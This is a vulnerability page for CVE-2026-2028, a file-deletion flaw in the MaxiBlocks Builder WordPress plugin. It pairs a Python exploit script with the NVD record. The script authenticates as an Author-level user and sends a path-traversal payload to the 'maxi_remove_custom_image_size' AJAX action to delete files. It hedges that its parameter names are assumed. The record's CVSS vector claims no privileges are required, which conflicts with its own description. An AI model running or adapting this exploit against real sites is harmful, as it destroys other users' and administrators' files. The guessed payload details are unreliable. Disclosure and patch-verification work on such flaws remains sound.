CVE-2026-2028

import requests # Configuration target_url = 'http://example.com/wp-admin/admin-ajax.php' login_url = 'http://example.com/wp-login.php' username = 'author_user' # Low privileged user password = 'password' # Initialize session session = requests.Session() # 1. Authenticate as Author (or higher) login_data = { 'log': username, 'pwd': password, 'redirect_to': 'http://example.com/wp-admin/', 'testcookie': '1' } session.post(login_url, data=login_data) # 2. Exploit Arbitrary File Deletion # The action 'maxi_remove_custom_image_size' is vulnerable # Assuming the plugin expects an image ID or path, we manipulate the input. # Note: Actual parameter name may vary based on plugin implementation (e.g., 'id', 'path', 'size_id') payload = { 'action': 'maxi_remove_custom_image_size', 'id': '../../../uploads/victim_image.jpg' # Path traversal or arbitrary ID reference } response = session.post(target_url, data=payload) if response.status_code == 200: print("[+] Request sent. Check if the file was deleted.") print(response.text) else: print("[-] Failed to send request.")

{"cve": {"id": "CVE-2026-2028", "sourceIdentifier": "[email protected]", "published": "2026-04-24T04:16:09.360", "lastModified": "2026-04-24T14:38:26.740", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The MaxiBlocks Builder plugin for WordPress is vulnerable to arbitrary media file deletion due to insufficient file ownership validation on the 'maxi_remove_custom_image_size' AJAX action in all versions up to, and including, 2.1.8. This makes it possible for authenticated attackers, with Author-level access and above, to delete arbitrary files in the wp-content/uploads directory, including files uploaded by other users and administrators."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://github.com/maxi-blocks/maxi-blocks/commit/3dff1db57bfb4e6c14fa7fd42037178d1d0ce199", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/maxi-blocks/tags/2.1.7/core/class-maxi-image-crop.php#L44", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/maxi-blocks/trunk/core/class-maxi-image-crop.php#L44", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3476709/maxi-blocks/trunk/core/class-maxi-image-crop.php", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3476709%40maxi-blocks&new=3476709%40maxi-blocks&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/f50c31df-56d0-4c34-a93c-56198fe91b36?source=cve", "source": "[email protected]"}]}}